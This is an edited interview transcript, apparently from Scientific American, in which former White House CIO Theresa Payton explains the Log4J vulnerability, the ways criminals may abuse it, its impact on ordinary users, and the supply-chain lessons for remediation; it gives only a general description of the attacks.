The Log4J Software Flaw Is ‘Christmas Come Early’ for Cybercriminals

Researchers have just identified a security flaw in a software program called Log4J, widely used by a host of private, commercial and government entities to record details ranging from usernames and passwords to credit card transactions. Since the glitch was found last weekend, the cybersecurity community has been scrambling to protect applications, services, infrastructure and even Internet of Things devices from criminals—who are already taking advantage of the vulnerability.

“For cybercriminals this is Christmas come early, because the sky’s the limit,” says Theresa Payton, a former White House chief information officer and the CEO of Fortalice Solutions, a cybersecurity consulting company. “They’re really only limited by their imagination, their technical know-how and their own ability to exploit this flaw.” Payton spoke with Scientific American about what Log4J does, how criminals can use its newly discovered weakness, and what it will take to repair the problem.

[An edited transcript of the interview follows.]

What is Log4J, and how is it used?

In both technology and cybersecurity teams, everybody needs really good logs. You need logging for audit trails, in the event of a ransomware event, to do forensics, sometimes for regulatory considerations. And so [Log4J] is a Java feature and function where you log things. You could log the fact that somebody used this particular type of credit card, you could log the fact that somebody just logged in today, any number of different types of events could be captured.

But Log4J has a major security flaw.

This type of vulnerability means somebody can inject instructions into the logs and make the logs do anything they want them to do. Researchers discovered this vulnerability—and I always say thank goodness for the researchers—in early December. Basically, it allows an attacker to have unauthenticated remote code access to the servers. So they can send instructions, they can execute things, and potentially do it completely undetected. There’s already been examples of where attackers have leveraged the Log4J vulnerability. They’ve installed cryptocurrency mining malware on unknowing machines. If we recall the Internet of Things being taken over by the Mirai botnet, the Mirai botnet also looks like it’s attempting to leverage it.

What else can cybercriminals do with this vulnerability?

Because it’s logging, you could potentially inject an instruction to say, “When you log in credentials for a user, also send them over here.” And it will be a place that the cybercriminal will set out to capture the login credentials. You can almost create your own cybercriminal command and control of logs. Logs can log almost anything, such as logins, credit card information, payment information. It just depends on how a developer decided to use that feature and functionality of logging: what kind of data is in that log, and whether or not it’s encrypted. The question is, are there different safeguards put around the logging? And are there any types of monitoring around logging to see whether or not logging itself has anomalous behavior? If an organization isn’t looking for anomalous behavior, they’re not going to notice that, once a user ID and password gets logged, that it just went somewhere else as well.

On the security team side of things—as we’re all racing against the clock to find, patch, remediate, observe, log and try to fix these issues—cybercriminals will be taking advantage of the vulnerability. Cybercriminals tend to share and create different attacks. There will most likely be crimeware as a service that will be made available to cybercriminals and nontechnical people to take advantage of.

What does this mean for people who do not work in cybersecurity, but who use applications and services as part of daily life?

You could potentially find out that you were the victim of identity theft. You could potentially go to log in—to get service from any number of companies that you do business with—and find out they’ve got an outage, and they could be dealing with this issue. You might try to contact a government organization to check on a refund or pay a tax and not be able to, because somebody compromised them through this particular vulnerability.

It’s just hard to say exactly how this is going to play out, because we’re still in the early days of really understanding. This has the potential for a very long tail, to be a problem for a long period of time. This is not “patch everything this weekend, and then we all get to go back to Christmas vacation.”

What needs to be done to fix this problem?

I like to use the analogy of a construction nail, [which] could be used in a house, a building, a bridge. And if somebody were to say, “We just realized all of these construction nails have a vulnerability, and they could be rendered inoperable at any moment.” There’s lots of different types of construction nails, but you have to go figure out where did you use this nail. And now we’re asking construction companies to find and replace the nails before they fail.

You have large companies and sets of infrastructure, who have now got to go on this fact-finding hunt [for Log4J in their systems]. A lot of times people don’t sit down and do a detailed blueprint. Having an accurate inventory of where this logging feature has been deployed, within your code, is lots of needles in lots of different haystacks. Typically, when we have a security vulnerability like this, the security officer can take charge and say, “I’m going to own this, and I’m going to own the remediation effort.” This is different, because it’s supply chain: a lot of people use open source, they use third-party vendors, they use offshore development and widgets, and all of [these software sources] could potentially have Log4J. The supply chain just for one Internet of Things device—think Alexa [or] Google Home—could have anywhere from 10 to 50 to 60 different companies making the different pieces and parts: the firmware, the operating system, and the development of the apps. Just trying to remediate that for one product could be an incredibly onerous task.

What lessons can we learn from this vulnerability?

If you think about SolarWinds, which was another supply chain issue around this time last year, a lot of people said, “Oh, we don’t use the product, so therefore, we’re probably okay.” And what you learned was, if you’re in an ecosystem that has SolarWinds, you have to take remediation. You need to find out from your in-house, offshore, near-shore, outsource developers, how they are doing an inventory. We learned the hard way that compiling of software and doing quality assurance of software builds is very complex and hard to do, and not always followed down to the nitty-gritty details.

A big lesson learned is, we have chinks in the armor in the supply chain, and we will continue to have them. This will not be the last one of these issues. How do you make sure you have a playbook where, when these issues arise, you can pull the right players together to get an assessment: “Is this really bad, or is this a nothingburger for our organization, and we’re going to be okay?” The second thing that people need to be thinking about here is, what other fail-safes do you have built in place? For example, if an attacker takes advantage before you get to patch—and they are commandeering your logging and the information in the logs—could you detect them hiding their traffic? Those are all the lessons learned, and they’re hard lessons. I mean, if they were easy to do, businesses would do them; governments would do them. It sounds great on paper—but it’s really hard, in practice, to implement.